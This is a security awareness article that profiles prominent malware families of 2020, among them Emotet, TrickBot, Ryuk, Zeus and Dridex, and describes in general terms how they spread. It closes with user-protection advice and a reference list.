Introduction: The upsurge of malware
Malware is a favorite way for cybercriminals to launch attacks. A number of malware types have made the news as responsible for data theft and high-profile privacy breaches.
According to Malwarebytes Labs’ new report, “the Trojan-turn ed-botnets Emotet and TrickBot [re-coded to work as malware loaders] made a return in 2019 to terrorize organizations alongside new ransomware families, such as Ryuk, Sodinokibi, and Phobos.” Emotet, Trickbot and Ryuk have also been revived to attack, especially in financial settings. SamSam is often deployed using a wide range of exploits or brute-force tactics.
According to the Center for Internet Security, the list of most prolific malware last year included ZeuS (aka Zbot, a malicious banking Trojan), Kovter (a pervasive click-fraud Trojan) and Dridex (a well-known Trojan). Malspam — spam email that delivers malware — was the primary infection vector.
Top malware to watch in 2020
Here’s this year’s biggest cybersecurity threats on the internet:
Emotet is today’s most dangerous, costly and destructive malware to date. Emotet “functions as a downloader or dropper of other banking trojans,” per the Center for Internet Security (CIS). Spreading through e-mails with phishing content, this malware type is also able to infect entire networks quickly by collecting and exploiting contacts.
Kovter is a family of malware that appeared in 2014 but has changed its skin quite a few times. In the beginning, it was mostly ransomware and tricking users by making them think they were being fined by law enforcement. Then it reappeared as a click-fraud malware using code injection to grab information and sending it back to the malicious hackers. Later, it resurfaced as fileless malware, using installation of autorun registry entries, and then as part of several phishing campaigns.
Today, Kovter is ranked among the most prolific malware over the past few years. It is commonly distributed via attachments that once clicked installs a shell code that is used to infect the target.
Ryuk is a prevalent ransomware which is often dropped on a system by other malware (e.g., TrickBot) and can be extremely costly and destructive. It uses RSA and AES encryption algorithms with a unique key for each executable. Ryuk’s campaigns have been used for attacks against large organizations and government agencies for a high-ransom return.
Zeus, the most widespread banking malware, is distributed primarily via spam or phishing campaigns (or drive-by downloads). Using keystroke logging, hackers easily steal banking credentials from users of compromised systems.
It is not a recent Trojan; it was actually identified in 2007 during an attack on the US Department of Transportation. However, it brought the greatest damage two years later with its use against Cisco, Amazon, Oracle and Bank of America.
Presently, the Zeus botnet is believed to be one of the most pervasive and damaging banking Trojan variants to date. As this malicious code can be easily enhanced or modified for future attacks, Zeus lives on today, as “many other malware variants have adopted parts of its codebase.”
Dridex is another banking Trojan that is also known as Bugat or Cridex. It targets financial information via phishing and mail spam that allows unauthorized transfers from a victims’ bank account. In 2019, this malware impacted numerous countries resulting in both data and monetary loss.
The Dridex botnet first appeared in 2012 and by 2015 had become one of the most prevalent financial Trojans. According to the US-CERT Alert (AA19-339A), Dridex has re-emerged with new attack tactics: it is now used as an implant in the infection chain alongside the Bitpaymer and DoppelPaymer ransomware and targets any small to medium-sized organizations which are at risk.
The malware and its various iterations have become infamous for personalized and targeted hits against the financial services sector, including both banking institutions and customers, according to the Department of Homeland Security. It has also been used in combination with ransomware attacks against a number of online financial operations infecting users downloading Dridex malware onto the affected system.
Trickbot is one of the more recent banking Trojans targeting Windows machines and already updated several times in order to be more and more effective in stealing personal data and bank credentials. In the last couple of years, it has improved its ability to hide itself and be more difficult to detect. It now spreads in multiple ways, not only via phishing but also as a secondary payload, via connected, infected systems (a corporate network for example) as observed in the steady amount of detections throughout 2019 mentioned in the Malwarebytes Labs 2020 State of Malware Report.
The way it attacks is often through an email that links to a file on Google Docs. Users are led to believe the document is a PDF, but in reality, the file is executable. Once activated, it shows a fake error message that informs users that the file is not available while acting undisturbed in the background.
“Since inception in late 2016, the TrickBot banking trojan has continually undergone updates and changes in attempts to stay one step ahead of defenders and internet security providers,” writes Webroot. “The TrickBot authors continue to target various financial institutions across the world, using MS17-010 exploits in an attempt to successfully laterally move throughout a victim’s network.” This makes it a serious risk for businesses.
Malware is going strong and threatening our systems more and more. According to AV-Test Institute, over 15 million new pieces of malware are spotted every month. But what are the types that are actually being used the most and are expected to plague the internet in 2020?
Ransomware is always evolving. Lately, malicious hackers are not only hijacking accounts and demanding money to unblock them; they are also exposing sensitive stolen data if users don’t comply promptly. Maze Ransomware (identified by the TA2101) is an example of such an attack. It was used against security staffing firm Allied Universal and resulted in exposure of 10% of the stolen files. They told Binary Defense, which said: “The threat actors reached out directly to Bleeping Computer, informing them of the infection and details on what happened.”
Trojans continue to move forward as a modern threat. Trojans like Emotet are still a serious threat to businesses due to their persistence and ease of network propagation. Lately, they have been distributed especially through macro-enabled documents of common types (such as Word and Excel).
Fileless malware attacks will also become more commonplace in 2020, and Malwarebytes Labs has observed a growing number of exploit kits in fall 2019. Organized crime groups are also expanding their operations to include using fileless ransomware to ensure their malicious attacks work; Kovter and WannaMine are examples of this type of malware that are causing an increasing number of infections.
Conclusion and recommendations
New malicious programs are recorded every day. A surprising number of malware attacks are successful because end users have not installed a security app (an antivirus, anti-spyware and/or anti-malware) to keep their computer or mobile device safe from today’s threats. Awareness is, as always, however, one of the most effective weapons against malware.
Be attentive of various malicious campaigns — especially this year, with a flood of emails and articles related to the COVID pandemic and the US elections. Being able to recognize danger and act appropriately at the user level is paramount.
- Malware explained: How to prevent, detect and recover from it, CSO
- All about malware, Malwarebytes
- 2020 State of Malware Report, Malwarebytes Labs
- Malware Threat Insights, Reason Labs
- Who Made the List Of 2019’s Nastiest Malware?, Dark Reading
- These were the worst malware strains of 2019, TechRadar
- 3 Malware Trends to Watch Out for in 2020, Tripwire, Inc.
- These Are The Top Windows And Mac Malware Threats For 2020…, Forbes
- 2019 Online Malware and Threats: A Profile of Today’s Security Posture, Dark Reading
- Top 10 Malware December 2019, Center for Internet Security
- Top 10: Most Dangerous Malware That Can Empty Your Bank Account, Heimdal Security
- Is ‘REvil’ the New GandCrab Ransomware?, Krebs on Security
- Emotet revisited: pervasive threat still a danger to businesses, Malwarebytes
- Stalkerware and mobile advertising Trojans rank as top mobile threats, Kaspersky Lab
- 15 (CRAZY) Malware and Virus Statistics, Trends & Facts 2020, SafetyDetective
- Zeus Virus AKA Zbot – Malware of the Month, November 2019, Security Boulevard
- Dridex — Malware of the Month, December 2019, Security Boulevard
- MS-ISAC Security Primer- Emotet, Center for Internet Security
- Ransomware-as-a-Service (RaaS): How It Works, Tripwire, Inc.
- Malware Most Foul: Emotet, Trickbot, Cryptocurrency Miners, BankInfoSecurity.com
- Mobile malware evolution 2019, Kaspersky Lab
- TrickBot Banking Trojan Adapts with New Module, Webroot Inc.